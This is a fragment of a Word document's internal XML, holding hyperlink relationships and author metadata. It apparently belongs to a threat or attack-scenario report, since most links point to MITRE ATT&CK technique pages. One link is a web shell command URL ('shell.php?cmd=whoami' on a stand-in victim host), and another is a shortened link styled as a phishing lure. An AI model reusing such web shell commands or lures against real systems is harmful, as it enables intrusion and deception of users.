Id="R8f1102bc0c494761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1566/002" TargetMode="External" Id="R84260da8fc39427c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bit.ly/hr-policy-update" TargetMode="External" Id="Rfb60a902cf4740a8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External" Id="R294b4339ab40431b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://victim.com/upload/shell.php?cmd=whoami" TargetMode="External" Id="Reae84324291e4b86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133" TargetMode="External" Id="Rbe82cf360e8041c1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059/001" TargetMode="External" Id="Rf31981b9f00241d2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203" TargetMode="External" Id="R81fefd8b39e84b81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/005" TargetMode="External" Id="Rba5336e7eb944253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1547/001" TargetMode="External" Id="Rd9e166923fa24274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136/001" TargetMode="External" Id="Rc1f7c3f556ef4d43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053/003" TargetMode="External" Id="R7523831b2bef45b0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R17ffdc9ad97e42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2025-07-31T03:31:31.1632321Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-31T12:02:32.9411414Z</dcterms:modified>
  <dc:creator>Nikhil Saini</dc:creator>
  <lastModifiedBy>Nikhil Saini</lastModifiedBy>
</coreProperties>
</file>